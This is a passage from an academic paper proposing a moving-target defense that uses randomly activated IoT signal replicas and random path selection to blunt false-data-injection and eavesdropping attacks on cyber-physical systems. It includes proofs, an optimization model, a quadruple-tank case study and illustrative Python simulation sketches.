The architecture of the proposed MTD-IDR framework is shown in Fig. 1. In the proposed MTD-IDR framework, the CPS sensor signals (e.g., temperature, pressure, velocity) and control commands (e.g., injected voltage, open/close of a valve) are replicated by a group of IoT devices. The IoT-enabled data replication process is carried over the out-of-band private data exchange layer in Fig. 1, consisting of a data-centric databus that facilitates the access of the IoT devices to source data (i.e., sensor readings or control commands). The number of replicas associated to each signal is optimally allocated by solving an optimization problem that takes into account the mathematical model representing the dynamics of the physical system and the total number of available IoT devices. Then, the random replica activation algorithm selects at each time instant a subset of replicas to transmit their information over the system's control network. This intermittent data transmission increases the network performance, while decreasing the amount of data an adversary can gather from a specific replica. Finally, the random path selection algorithm, located next to the intended receiver, e.g., a controller, selects one of the transmitted replicated signals that will eventually be used by the CPS.

Fig. 1. Architecture of the proposed MTD-IDR framework.

In the proposed MTD-IDR framework, the random replica activation and path selection algorithms add two layers of uncertainty that make it harder for adversaries to learn the system model (reconnaissance), and reduce the impact and success probability of FDI attacks. Furthermore, the proposed MTD-IDR solution does not induce any performance degradation to the physical system, as compared to existing MTD approaches [19]–[23]. The details of the private data exchange interface, control network vulnerabilities, random replica activation, and random path selection are presented in Sections II-A to II-D, respectively. The replica allocation algorithm is described in Section III.

A. Private Data Exchange Network

The private data exchange network in Fig. 1 is an out-of-band network that is isolated from the main control network. In the proposed MTD-IDR framework, devices and replicas each have two network interfaces: one to connect to the control network and the other to the private data exchange network. In order to guarantee high network performance, even with large data volumes as the CPS expands, the private data exchange is based on a data-centric messaging scheme (utilizing a databus), and follows the peer-to-peer publish-subscribe communication scheme [24], [25].
The publish-subscribe scheme enables the information streams (instances) to be reliably disseminated to several applications (replicas), while maintaining adequate network performance. After selecting the number of replicas and defining a shared data model, devices are able to publish keyed, updated instances of that model (based on their respective ID), while replicas filter their subscriptions to the data based on those keys. Using keys eliminates the need for duplicating data structures, and is an example of the data filtering that the adopted databus provides.

B. Control and Communication Network Vulnerability

Recall that the private data exchange corresponds to an out-of-band network that cannot be accessed externally. However, the control network is in charge of transmitting the information from each replica to the intended destination (e.g., the controller), making it susceptible to cyber attackers. Conventional communication networks for industrial applications are based on protocols such as Modbus and DNP3, which are vulnerable to cyberattacks due to their lack of authentication and encryption [26], [27]. Besides, the nature of such protocols is based on client-server communications, where devices communicate with a single server, which, from a security point of view, can create bottlenecks and single points of failure. Instead, we propose the use of a data-centric architecture (similar to the private data exchange), which uses fully distributed publish-subscribe communications where data are always available only to those applications that need them and that have the adequate access ID. For security-critical applications, data-centric communications can control access, enforce data flow paths, and encrypt data on-the-fly. These significantly increase the difficulty for adversaries to gain access to the information and compromise it. Even though data-centric communications offer stronger security guarantees than conventional ICS communication protocols, they are still susceptible to cyberattacks. In particular, a sophisticated adversary that knows the encryption key of one of the replicas could impersonate the replica and publish false information. Furthermore, an attacker that knows the encryption keys and ID could subscribe to a specific topic and eavesdrop on the information [28]. Therefore, our proposed MTD-IDR strategy can help to mitigate the impact of these sophisticated attackers by adding two layers of uncertainty that make the data intermittent, such that eavesdroppers would only capture incomplete information, and that also reduce the amount of false data reaching its destination.

Fig. 2. Illustration of the two uncertainty layers introduced by the proposed MTD-IDR. (a) An eavesdropper that intercepts one of the replicas gathers incomplete information. (b) Injected malicious data are not always selected by the random path selection algorithm, limiting the impact of the attack on the system operation.

C. Random Replica Activation

The MTD-IDR framework integrates the first layer of uncertainty for attackers by the random transmission of replicated data, as depicted in Fig. 2(a). Using this approach, if an adversary compromises a specific communication link, the sensor measurements or control commands they receive are going to be incomplete. Theorem 1 analytically calculates the level and the upper bound of uncertainty fed to the communication network as a result of the random replica activation algorithm.
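Before the formal analysis, the following minimal Python sketch (Python is the language used for the controller-side scripts in the implementation of Section IV, but this snippet is ours and purely illustrative) simulates both uncertainty layers for a single sensor: a nonempty subset of replicas is activated uniformly at random, and one of the active replicas is then selected to reach the controller. It empirically estimates (i) the probability that a fixed, eavesdropped replica transmits fresh data and (ii) the probability that a fixed, possibly compromised replica is the one finally delivered. The replica count, trial count, and seed are arbitrary assumptions.

```python
import random

def simulate_layers(n_replicas=3, trials=200_000, watched=0, seed=7):
    """Monte Carlo estimate of the two MTD-IDR uncertainty layers
    for a single sensor with `n_replicas` replicas.

    Returns (P[watched replica transmits], P[watched replica is delivered]).
    """
    rng = random.Random(seed)
    transmitted = delivered = 0
    for _ in range(trials):
        # Layer 1 (random replica activation): draw a nonempty subset,
        # uniform over all 2^n - 1 nonempty subsets (rejection sampling).
        active = []
        while not active:
            active = [i for i in range(n_replicas) if rng.random() < 0.5]
        if watched in active:
            transmitted += 1
        # Layer 2 (random path selection): exactly one active replica
        # reaches the intended receiver.
        if rng.choice(active) == watched:
            delivered += 1
    return transmitted / trials, delivered / trials

if __name__ == "__main__":
    p_tx, p_sel = simulate_layers(n_replicas=3)
    # Theory: 2^(n-1)/(2^n - 1) = 4/7 ~ 0.571 and 1/n = 1/3 ~ 0.333.
    print(f"P(transmit) ~ {p_tx:.3f}, P(delivered) ~ {p_sel:.3f}")
```

For three replicas the two estimates settle near 4/7 and 1/3, matching the closed-form expressions derived next.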
The analysis is performed on sensor signals, denoted as $y_i$, but the results are the same for control commands.

Theorem 1: Consider a CPS with the proposed MTD-IDR framework. Suppose that an adversary is able to intercept the data transmitted by the $l$th replica of the sensor measurement $y_i$. Let $n_{s,i}$ be the number of replicas associated with the $i$th sensor reading; then the probability that the $l$th replica is transmitted, such that the adversary receives new information, is given by

$$p^{l}_{T_{s,i}} = \frac{2^{n_{s,i}-1}}{2^{n_{s,i}}-1}. \qquad (1)$$

Consequently, the random replica activation layer can limit the information intercepted by an adversary by up to 50%.

Proof: Suppose that for sensor signal $y_i$ there are $n_{s,i}$ available replicas, denoted by $y^{r}_i=\{y^{r_1}_i, y^{r_2}_i, \ldots, y^{r_{n_{s,i}}}_i\}$. Let $I_i=\{1,2,\ldots,n_{s,i}\}$ denote the set of all replicas for sensor $i$ and let $I^{r}_i$ be the set of all possible combinations of the elements of $I_i$. For instance, if $I_i=\{1,2,3\}$, then $I^{r}_i=\{1,2,3,\{1,2\},\{1,3\},\{2,3\},\{1,2,3\}\}$. At the $k$th sampling instant, only a subset of replicas with indices defined by $I^{tr}_i(k)$ transmit information, where $I^{tr}_i(k)\in I^{r}_i$. The subset $I^{tr}_i(k)$ is randomly selected from the set $I^{r}_i$ with probability $1/(2^{n_{s,i}}-1)$, which is determined by the size of $I^{r}_i$. For each sensor $i$, the group of replicas transmitted is defined by the vector $y^{tr}_i=\{y^{r_j}_i\in y^{r}_i \mid j\in I^{tr}_i(k)\}$, such that $y^{tr}_i\subseteq y^{r}_i$. As the replica activation layer randomly selects the replicas to transmit, data are not always available on each specific communication channel, causing adversaries that gained access to a single channel to capture incomplete data. Given that the probability distribution over all subsets of replicas is uniform (i.e., the probabilities that a specific subset of $I^{r}_i$ is selected are the same), the probability that the $l$th replica of sensor $i$ is transmitted is given by $p_{T_{s,i}}=\Pr[I^{tr}_i(k)=\{l\}]+\Pr[I^{tr}_i(k)=\{l,l+1\}]+\cdots+\Pr[I^{tr}_i(k)=\{1,2,\ldots,n_{s,i}\}]$. The number of index subsets of $I^{r}_i$ that contain index $l$ is $2^{n_{s,i}-1}$. Therefore, we have that $p^{l}_{T_{s,i}}=2^{n_{s,i}-1}/(2^{n_{s,i}}-1)$, which yields (1). Note that if $n_{s,i}=1$, then $p_{T_{s,i}}=1$; for $n_{s,i}=2$, $p_{T_{s,i}}=2/3$. In the limit, $\lim_{n_{s,i}\to\infty} p_{T_{s,i}}=1/2$, which indicates that the replica activation layer can limit the information intercepted by an adversary by up to 50%.

D. Random Path Selection

The proposed MTD-IDR framework integrates the second layer of uncertainty for attackers through the selection of transmitted signals by the random path selection algorithm. The main goal of the random path selection algorithm is to decrease the possibility that malicious data reach their intended destination. If an attacker is able to corrupt any of the replicated signals, the probability that the corrupted signal is selected by the random path selection algorithm decreases with the number of available replicas. This, in return, reduces the impact of an FDI attack on the system operation [see Fig. 2(b)]. The following theorem (Theorem 2) analytically calculates the probability that malicious data are selected by the path selection algorithm and reach the controller.

Theorem 2: Consider the MTD-IDR framework with the two layers of uncertainty introduced by the random replica activation and random path selection layers. Suppose that an adversary is able to inject false data into only one active replica of sensor $i$.
If the number of replicas of sensor $i$ is $n_{s,i}$, then the probability that the attack will reach the controller is given by

$$p_{s,i}=\frac{1}{n_{s,i}}. \qquad (2)$$

Similarly, $p_{u,j}=1/n_{u,j}$ denotes the probability that an attacked replica of the $j$th control command reaches the physical system.

Proof: Let $J^{sel}_i(k)\in I^{tr}_i(k)$ be the index of the replica that is randomly selected by the path selection algorithm. Since $I^{tr}_i(k)\in I^{r}_i$, and the set $I^{r}_i$ is composed of subsets of different sizes up to size $n_{s,i}$, the probability that replica $l$ of sensor $i$ is selected by the random path selection algorithm is given by

$$\Pr\big[J^{sel}_i(k)=l\big]=\Pr\big[I^{tr}_i(k)=\{l\}\big]+\frac{\Pr\big[I^{tr}_i(k)=\{l,l+1\}\big]}{2}+\frac{\Pr\big[I^{tr}_i(k)=\{1,l\}\big]}{2}+\cdots+\frac{\Pr\big[I^{tr}_i(k)=\{1,2,\ldots,n_{s,i}\}\big]}{n_{s,i}}. \qquad (3)$$

Note that the number of subsets of size $t$ in $I^{r}_i$ that contain $l$ is given by $\binom{n_{s,i}-1}{t-1}$. Also, the number of all subsets that contain $l$ is $2^{n_{s,i}-1}$. Therefore, we can rewrite (3) as follows:

$$\Pr\big[J^{sel}_i(k)=l\big]=\frac{1}{2^{n_{s,i}}-1}\sum_{t=0}^{n_{s,i}-1}\frac{\binom{n_{s,i}-1}{t}}{t+1}. \qquad (4)$$

Expanding the term inside the summation,

$$\frac{\binom{n_{s,i}-1}{t}}{t+1}=\frac{(n_{s,i}-1)!}{(n_{s,i}-1-t)!\,t!}\,\frac{1}{t+1}=\frac{1}{n_{s,i}}\binom{n_{s,i}}{t+1} \qquad (5)$$

such that

$$\sum_{t=0}^{n_{s,i}-1}\binom{n_{s,i}}{t+1}=\sum_{t=0}^{n_{s,i}}\binom{n_{s,i}}{t}-1. \qquad (6)$$

Using $\sum_{k=0}^{n}\binom{n}{k}=2^{n}$, we have

$$\Pr\big[J^{sel}_i(k)=l\big]=\frac{1}{2^{n_{s,i}}-1}\,\frac{1}{n_{s,i}}\left(\sum_{t=0}^{n_{s,i}}\binom{n_{s,i}}{t}-1\right)=\frac{1}{n_{s,i}}. \qquad (7)$$

The exact same procedure applies for replicas of control commands. This concludes the proof.

III. OPTIMAL REPLICA ALLOCATION MODEL

We discussed in Section II that the proposed MTD-IDR framework adds two layers of uncertainty that depend on the number of replicas associated to each signal. Given that the number of replicas is limited by the number of available IoT devices, it is necessary to strategically allocate them in order to maximize their benefits. In particular, this allocation depends on the dynamic behavior and control architecture of the physical system. For instance, a control system can be more sensitive to changes in a specific sensor reading; therefore, more IoT devices should replicate that particular sensor. The proposed allocation methodology exploits tools from control theory and optimization for linear time-invariant (LTI) system approximations, to find the best combination of IoT replicas that minimizes the impact of an attack in terms of the deviation of the CPS from its normal operation. The design solution will inherently also affect the capability of the adversary to gather accurate information about the system behavior.

A. Linear-Time System Model and Control

Many physical systems have a dynamic behavior that depends on process variables in a nonlinear manner. As a consequence, nonlinear models can be linearized in order to analyze stability or design controllers using classical linear system techniques. Typically, linearized models are relatively accurate in a region near the nominal condition, and can be represented by a set of differential (or difference) equations that capture their dynamical behavior.
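As a concrete, deliberately simplified illustration of this linearization step, the sketch below numerically linearizes a single-tank level model, dh/dt = -(a/A)*sqrt(2*g*h) + (k/A)*u, around an operating point and discretizes it with a forward-Euler step. The tank parameters, sample time, and operating input are illustrative placeholders chosen by us; the QTP model used later is obtained from the linearization in [35].

```python
import numpy as np

# Single-tank level dynamics: dh/dt = -(a/A)*sqrt(2*g*h) + (k/A)*u
# (illustrative parameter values, not the QTP parameters of [35]).
a_out, A_tank, k_pump, g = 0.07, 28.0, 3.3, 981.0   # cm^2, cm^2, cm^3/(s*V), cm/s^2

def f(h, u):
    return -(a_out / A_tank) * np.sqrt(2.0 * g * h) + (k_pump / A_tank) * u

def linearize(h0, u0, eps=1e-6):
    """Finite-difference Jacobians of f around the operating point (h0, u0)."""
    A_c = (f(h0 + eps, u0) - f(h0 - eps, u0)) / (2 * eps)
    B_c = (f(h0, u0 + eps) - f(h0, u0 - eps)) / (2 * eps)
    return A_c, B_c

# Operating point: the level h0 at which the chosen input u0 holds the tank steady.
u0 = 3.0
h0 = (k_pump * u0 / a_out) ** 2 / (2.0 * g)          # solves f(h0, u0) = 0
A_c, B_c = linearize(h0, u0)

# Forward-Euler discretization with sample time Ts: x(k+1) = A x(k) + B u(k), y = C x.
Ts = 1.0
A_d, B_d, C_d = 1.0 + Ts * A_c, Ts * B_c, 1.0
print(f"h0 = {h0:.2f} cm, discrete model: A = {A_d:.4f}, B = {B_d:.4f}, C = {C_d}")
```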
Linear approximations provide insights on the system's response to disturbances or changes in the control input [29], making them suitable for analyzing the impact of cyberattacks. This article utilizes the following linear system representation to model the underlying physical system of the CPS:

$$x(k+1)=Ax(k)+B\tilde{u}(k), \qquad y(k)=Cx(k) \qquad (8)$$

where at each time sample $k$, $x(k)\in X$ is the vector of size $n$ that represents the system states (e.g., temperature, velocity, pressure, etc.), $u(k)\in U$ is the vector of size $m$ that represents the control inputs (e.g., valve position, acceleration, steering angle, etc.), and $\tilde{u}(k)$ is computed by the MTD-IDR associated to the control command signals. Matrices $A\in\mathbb{R}^{n\times n}$ and $B\in\mathbb{R}^{n\times m}$ indicate how the current states and control action will affect the future states, and matrix $C\in\mathbb{R}^{p\times n}$ relates the system states and the sensor measurements. Since not all states in a system are measurable, it is common practice to use state observers (e.g., the Kalman filter) in order to estimate the observable states and take adequate control actions [30]. For simplicity, we consider the steady-state Kalman filter of the form

$$\hat{x}(k+1)=A\hat{x}(k)+Bu(k)+L\big(\tilde{y}(k)-C\hat{x}(k)\big) \qquad (9)$$

where $\hat{x}(k)$ corresponds to the estimated states, $\tilde{y}(k)$ corresponds to the MTD-IDR output with respect to the sensor readings, and $L$ is the Kalman filter gain designed to minimize the state estimation error $e(k)=x(k)-\hat{x}(k)$. Therefore, the controller action can be defined by the following equation:

$$u(k)=K\hat{x}(k) \qquad (10)$$

where $K$ is the control gain that is designed to guarantee that the system states remain around some desired operating point. The design of $K$ can be carried out using the pole placement approach, Lyapunov stability, or by solving the linear quadratic regulator (LQR) problem.

B. Decreasing Attack Impact

One of the main challenges when protecting CPSs from cyber threats is that predicting the attacker's action is infeasible. Several works define defense strategies for very specific attack vectors, but lack the generality necessary in real applications where the attacker's action is unknown. Murguia et al. [31] have introduced a methodology to quantify the impact of unknown attacks, only under the assumption that they are bounded. The idea is based on the approximation of the attacker's reachable set, which is defined as follows.

Definition 1 (Attacker's Reachable Set): For a given initial state $x_0$, the attacker's reachable set $R_a$ corresponds to the set of states $x\in X$ that can be reached starting from $x_0$ by any arbitrary attack sequence $\delta(1),\delta(2),\ldots$, where each input is bounded by $\delta_{\min}\leq\delta(k)\leq\delta_{\max}$.

Computing the exact reachable set $R_a$ is computationally intractable for systems whose states belong to the real space, i.e., $x(k)\in\mathbb{R}^{n}$; however, there are tools from control theory to find ellipsoids that contain the reachable set. An ellipsoid can be mathematically represented in vector form as $E(Q)=\{x\in\mathbb{R}^{n}\mid x^{\top}Q^{-1}x\leq 1\}$. Therefore, if we find an ellipsoid that contains the reachable set [i.e., $R_a\subseteq E(Q)$], then reducing the volume of the ellipsoid $E(Q)$ will also reduce the attacker's reachable set. Based on these ideas, we extend the results in [31] to allocate the number of replicas in such a way that the volume of $R_a$ decreases.
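As a quick numerical preview of why more replicas shrink the attacker-induced deviation, the following sketch simulates a scalar instance of the closed loop (8)-(10) under a constant sensor bias, where the compromised replica reaches the controller at each step with probability 1/n_s, as given by Theorem 2. The scalar plant, the hand-picked gains, and the bias value are illustrative assumptions of ours, not the QTP design used later.

```python
import random

# Scalar instance of (8)-(10): x(k+1) = A x + B u, y = C x,
# with observer gain L_obs and state-feedback gain K chosen by hand to be stabilizing.
A, B, C = 0.95, 0.50, 1.0
K, L_obs = -0.90, 0.50          # A + B*K = 0.5 and A - L_obs*C = 0.45 (both stable)
BIAS = 1.0                       # constant false-data bias on the compromised replica

def attacked_deviation(n_replicas, steps=400, trials=300, seed=3):
    """Average absolute state deviation when the biased replica is delivered
    to the controller with probability 1/n_replicas (Theorem 2)."""
    rng = random.Random(seed)
    total = 0.0
    for _ in range(trials):
        x = x_hat = 0.0
        acc = 0.0
        for _ in range(steps):
            selected = rng.random() < 1.0 / n_replicas       # random path selection
            y_tilde = C * x + (BIAS if selected else 0.0)    # corrupted measurement, cf. (11)
            u = K * x_hat                                    # eq. (10)
            x_hat = A * x_hat + B * u + L_obs * (y_tilde - C * x_hat)  # eq. (9)
            x = A * x + B * u                                # eq. (8), no actuator attack here
            acc += abs(x)
        total += acc / steps
    return total / trials

for n in (1, 2, 3, 5):
    print(f"n_s = {n}: mean |x| deviation ~ {attacked_deviation(n):.3f}")
```

The printed deviation decreases as the number of replicas grows, which is exactly the effect the allocation problem below quantifies through the ellipsoid volume.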
Suppose that an adversary is able to inject false data into the $l$th replica, such that $y^{r_l}_i(k)=y_i(k)+\delta_{y,i}(k)$, where $\delta_{y,i}(k)$ denotes the attacker's action. However, due to the random path selection algorithm, $y^{r_l}_i(k)$ may not be selected to reach the controller. As a consequence, the signal that is used by the controller can be written as

$$\tilde{y}_i(k)=y_i(k)+\theta_{y,i}(k)\,\delta_{y,i}(k) \qquad (11)$$

where $\theta_{y,i}(k)=1$ if the compromised replica is selected by the random path selection algorithm at instant $k$, and 0 otherwise. Note that when there is no attack, $\tilde{y}_i(k)=y_i(k)$, which implies that the system performance is not affected by the proposed MTD strategy. Similarly, for the controller, $\tilde{u}_i(k)=u_i(k)+\theta_{u,i}(k)\,\delta_{u,i}(k)$. The indicators $\theta_{y,i}(k)$ and $\theta_{u,i}(k)$ can be modeled as Bernoulli random variables with probabilities $p_{s,i}$ and $p_{u,i}$, respectively. The group of sensor readings and control commands selected by the random path selection algorithm can be represented in compact form as $\tilde{y}(k)=y(k)+\Theta_y(k)\delta_y(k)$ and $\tilde{u}(k)=u(k)+\Theta_u(k)\delta_u(k)$, respectively, with $\Theta_y(k)=\mathrm{diag}(\theta_{y,1}(k),\ldots,\theta_{y,p}(k))$ and $\Theta_u(k)=\mathrm{diag}(\theta_{u,1}(k),\ldots,\theta_{u,m}(k))$. Then, we define the extended vector $z=[x^{\top},e^{\top}]^{\top}$, where $e(k)=x(k)-\hat{x}(k)$. Combining (8)-(10), a compact LTI representation is obtained as

$$z(k+1)=Fz(k)+G(k)\,\delta(k) \qquad (12)$$

where

$$F=\begin{bmatrix}A+BK & -BK\\ 0 & A-LC\end{bmatrix}, \qquad G(k)=\underbrace{\begin{bmatrix}B & 0\\ B & -L\end{bmatrix}}_{S}\begin{bmatrix}\Theta_u(k) & 0\\ 0 & \Theta_y(k)\end{bmatrix}$$

and $\delta=[\delta_u^{\top},\ \delta_y^{\top}]^{\top}$. Note from (12) that $G(k)$ depends on matrices composed of Bernoulli random variables. Therefore, the evolution of the system states also becomes random. In order to formulate the replica allocation problem, the expectation of the system states at each instant $k$ is considered. To this end, the expectation operator $E[\cdot]$ is applied such that $\bar{z}(k)=E[z(k)]$. Recall from Theorem 2 that $p_{s,i}=1/n_{s,i}$ and $p_{u,i}=1/n_{u,i}$. Therefore, if $N=\mathrm{diag}(n_{u,1},\ldots,n_{u,m},n_{s,1},\ldots,n_{s,p})$, then it is easy to show that $E[G(k)]=SN^{-1}$, such that $\bar{z}(k+1)=F\bar{z}(k)+SN^{-1}\delta(k)$. The following theorem introduces the main design result to allocate the available replicas.

Theorem 3: Consider the discrete-time LTI system described in (12) with the proposed MTD-IDR framework. The total numbers of available replicas for sensor and control signals are $n_{sT}\geq p$ and $n_{uT}\geq m$, respectively. For a given $a\in(0,1)$, if there exist a positive-definite matrix $Q$ and integer vectors $n_s=[n_{s,1},n_{s,2},\ldots,n_{s,p}]$ and $n_u=[n_{u,1},\ldots,n_{u,m}]$ that solve the following problem (Problem 1), formulated as an MIQCP problem:

Problem 1:
$$\min_{Q,\,n_s,\,n_u}\ \mathrm{tr}(Q)$$
$$\text{s.t.}\quad Q>0,\quad n_{s,i}\geq 1,\quad n_{u,j}\geq 1$$
$$\sum_{i=1}^{p} n_{s,i}\leq n_{sT},\qquad \sum_{i=1}^{m} n_{u,i}\leq n_{uT}$$
$$\begin{bmatrix} aQ & 0 & QF^{\top}\\ 0 & (1-a)NRN & S^{\top}\\ FQ & S & Q\end{bmatrix}\succeq 0$$

then the numbers of replicas $n_s$ and $n_u$ are allocated to minimize the volume of the attacker's reachable set contained in the ellipsoid $E(Q)$.

Proof: The proof is straightforward, adapting the computation of the reachable set introduced in [31], where $\mathrm{tr}(Q)$ is proportional to the volume of the ellipsoid $E(Q)$.
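The following sketch explores Problem 1 numerically in a simplified way: rather than solving the full MIQCP (the paper uses YALMIP's BMIBNB solver, as described in Section IV), it enumerates the feasible integer allocations and solves the resulting semidefinite program for each fixed allocation with CVXPY. The placeholder plant, gains, the bound matrix R on the attack signal, and the scalar a are all assumptions made only for this illustration.

```python
import itertools
import numpy as np
import cvxpy as cp

def min_trace_Q(F, S, N, R, a):
    """Solve min tr(Q) subject to the LMI of Problem 1 for a *fixed* allocation N."""
    nz, nd = F.shape[0], S.shape[1]
    Q = cp.Variable((nz, nz), PSD=True)
    M = cp.bmat([
        [a * Q,              np.zeros((nz, nd)),   Q @ F.T],
        [np.zeros((nd, nz)), (1 - a) * N @ R @ N,  S.T],
        [F @ Q,              S,                    Q],
    ])
    M = (M + M.T) / 2                       # symmetrize (a no-op for symmetric Q)
    prob = cp.Problem(cp.Minimize(cp.trace(Q)),
                      [M >> 0, Q >> 1e-8 * np.eye(nz)])
    prob.solve(solver=cp.SCS)
    return prob.value if prob.status in ("optimal", "optimal_inaccurate") else np.inf

def allocate(F, S, R, p, m, nsT, nuT, a=0.95):
    """Brute-force search over integer allocations (tractable only for small p, m)."""
    best = (np.inf, None, None)
    for ns in itertools.product(range(1, nsT + 1), repeat=p):
        if sum(ns) > nsT:
            continue
        for nu in itertools.product(range(1, nuT + 1), repeat=m):
            if sum(nu) > nuT:
                continue
            # N lists control-command replicas first, then sensor replicas,
            # matching delta = [delta_u; delta_y].
            N = np.diag(list(nu) + list(ns)).astype(float)
            val = min_trace_Q(F, S, N, R, a)
            if val < best[0]:
                best = (val, ns, nu)
    return best

# Placeholder plant (2 states, 1 input, 2 outputs) with stabilizing gains K and L,
# assembled into F and S as in (12).
A = np.array([[1.0, 0.1], [0.0, 0.9]])
B = np.array([[0.0], [0.1]])
C = np.eye(2)
K = np.array([[-2.0, -3.0]])
L = 0.5 * np.eye(2)
F = np.block([[A + B @ K, -B @ K], [np.zeros((2, 2)), A - L @ C]])
S = np.block([[B, np.zeros((2, 2))], [B, -L]])
R = np.eye(3)                    # assumed bound matrix on the attack signal
print(allocate(F, S, R, p=2, m=1, nsT=5, nuT=3))
```

For this toy system the enumeration involves only a few dozen small SDPs; the monolithic MIQCP formulation of Problem 1 is the scalable route for larger systems.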
The solution of Problem 1 will provide the matrix $Q$ and the optimal allocation of IoT devices that minimizes the impact of a cyberattack sequence. Note that positive semidefinite and definite constraints in Problem 1 form closed convex cones [32]. Therefore, given that the objective function and constraints are convex, Problem 1 corresponds to a convex MIQCP, which can be solved using iterative algorithms based on branch & bound, gradient cuts, and outer approximation [33]. The convexity of the problem facilitates the computation of near-global solutions for large-scale systems [34].

IV. CASE STUDY: QUADRUPLE TANK PROCESS

In order to illustrate the potential benefits of the proposed MTD-IDR framework, the QTP described in Fig. 3 is considered [35].

Fig. 3. QTP with two water level sensors and two DC pumps that are controlled by a DC voltage.

The QTP has become a popular benchmark for researchers as it involves four highly interconnected tanks having nonlinear characteristics. The QTP system also has a wide range of applications in process industries, such as petrochemicals, wastewater treatment and purification, and pharmaceutical industries, among others [36]. In particular, the QTP has been widely used for testing the impact of cyberattacks on feedback control systems [37]. The process consists of four tanks, two pumps, and two water sensors, where the main goal is to control the water level in the lower two tanks by controlling the amount of water injected by the pumps. What makes this process complex is the cross interaction among the upper tanks, the lower tanks, and the pumps. In particular, if Pump 1 increases its water inlet flow (an increase in the DC voltage of the pump), it will increase the water level of Tanks 1 and 4; at the same time, since the level of water in Tank 4 is increasing, it will affect the water flowing from Tank 4 to Tank 2. The same happens with Pump 2 and Tanks 1-3. In addition, Valves 1 and 2 are fixed and they determine which portion of the pumped water flows to Tanks 1 and 4 (resp. Tanks 2 and 3) according to parameters $\gamma_1,\gamma_2$, with $\gamma_i\in(0,1)$. For instance, if $\gamma_1=0.3$, then 30% of the pumped water from Pump 1 will go to Tank 1 and 70% to Tank 4. The nonlinear equations obtained from a mass balance analysis are described in detail in [35]. The controller and state estimation used in this work are designed based on a discretized model of the linear approximation derived in [35].

A. QTP and MTD-IDR Implementation

The experimentation environment for implementing the proposed MTD-IDR integrates IoT devices to replicate sensor signals, and Python scripts that represent the controller, state estimation and dynamics of the QTP. The IoT replicas are developed in C++, and compiled and executed on a Linux operating system. The IoT devices in the implementation are Odroid XU4 devices with an ARM Cortex octa-core CPU and 2 GB of high-speed RAM. These devices are low cost and have the processing and networking power needed for data replication and random replica activation. Problem 1 has been solved using the BMIBNB solver in YALMIP [38], which uses an approach based on the branch & bound algorithm with nonlinear cuts that can rapidly find a feasible solution. In particular, using the discrete-time approximation of the QTP for $n_{sT}=5$ and $n_{uT}=5$, we found that the optimal number of replicas is $n_s=[1,4]$ and $n_u=[3,2]$. The proposed mechanism can be implemented in any low-cost, open-source, off-the-shelf single-board computer (SBC) with a network interface card, over which the DDS RTPS packets are exchanged. These types of SBCs have a price range of about U.S. $30 to U.S.
$80, for which the monetary investment for the proposed MTD is low in contrast with its benefits.

Fig. 4 shows the network architecture implemented via the data distribution service (DDS) middleware using the DDS API provided by RTI Connext DDS [39]. Within the network, the DDS institutes a global data space (GDS), i.e., the databus, and makes it available to all applications that authenticate themselves on the network. GDS1 represents the interface over which the replicas receive signals, and GDS2 represents the control network where replicas send back their replicated signals. Entities shown as circles in the GDSs are called topics. In the implementation, there are four topics, named Control Data, Sensor Data, Control Replicas, and Sensor Replicas. Each of these four topics has an associated data type, as shown in Fig. 4. Applications have publishers that write data to the databus and subscribers that read data from it. Whenever a publisher writes new data, the DDS middleware disseminates the updated instance of that data to all subscribers. Applications, therefore, interact by updating instances of these data items.

Fig. 4. DDS network architecture.

The arrows connecting applications to topics in Fig. 4 represent the logical relations between the publishers/subscribers of each application and the data items within the topics. In this implementation, sensors share information with their respective replicas by updating keyed instances of the Sensor_Data object associated to the Sensor Data topic. That is, all sensors share the same data model, but use their assigned IDs as keys to update distinct instances of the Sensor_Data data model. On the other hand, sensor replicas subscribe to the Sensor Data topic, and each replica filters the data in this topic to only receive the values with the key associated to the sensor it is replicating (e.g., replicas of sensor 1 will filter the data in the Sensor Data topic using the key ID = 1). In turn, each sensor replica then writes the data it received back to the Sensor Replicas topic with the replica ID, R_ID, as its key. The controller then subscribes to the Sensor Replicas topic and the random path selection algorithm selects one signal to generate the control commands. The same applies to the Controller Replicas. Through this implementation (i.e., interacting with data objects), the sensors, controllers, and their replicas are decoupled. Therefore, the system is highly scalable and the number of replicas can be dynamically changed (increased or decreased).

B. Decreasing the Attacker's Estimation Capabilities

We consider an adversary that intercepts the data of one replica per sensor and per actuator. The data can be used to learn important properties that will enable the design of stronger and even stealthy attacks. For instance, if the adversary is able to accurately estimate the system model, they can learn how their attacks will affect the system and then carefully tailor attack sequences that could remain stealthy or reach a specific goal, as was pointed out in [19] and [31]; a simplified sketch of such an estimation attempt is given below.
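As a rough illustration of that risk, and of why intermittent replica data hurts the eavesdropper, the sketch below fits a first-order ARX model by least squares to data generated from a known scalar system, once with complete measurements and once with measurements where non-transmitted samples are held at their last received value (the same zero-order-hold assumption used in the evaluation that follows). The scalar plant, noise level, and data length are arbitrary assumptions; only the transmission probability 8/15 is taken from Theorem 1 with four replicas. This is not the paper's evaluation, which is described next and uses standard identification tools.

```python
import numpy as np

rng = np.random.default_rng(0)

# "True" scalar plant the eavesdropper tries to identify:
# y(k) = a*y(k-1) + b*u(k-1) + noise   (illustrative values).
a_true, b_true, n = 0.8, 0.5, 2000
u = rng.normal(size=n)
y = np.zeros(n)
for k in range(1, n):
    y[k] = a_true * y[k - 1] + b_true * u[k - 1] + 0.02 * rng.normal()

def arx_fit(y_obs, u_obs):
    """First-order ARX least-squares fit: returns estimates of (a, b)."""
    Phi = np.column_stack([y_obs[:-1], u_obs[:-1]])
    theta, *_ = np.linalg.lstsq(Phi, y_obs[1:], rcond=None)
    return theta

# Eavesdropped stream: with probability (1 - p_tx) a sample is not transmitted
# and the adversary holds the previous value (zero-order hold).
p_tx = 8 / 15           # Theorem 1 with n_s = 4 replicas
y_held = y.copy()
for k in range(1, n):
    if rng.random() > p_tx:
        y_held[k] = y_held[k - 1]

print("full data    (a, b):", arx_fit(y, u))
print("intermittent (a, b):", arx_fit(y_held, u))
```

The intermittent stream produces visibly biased parameter estimates, mirroring the accuracy loss reported in the evaluation below.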
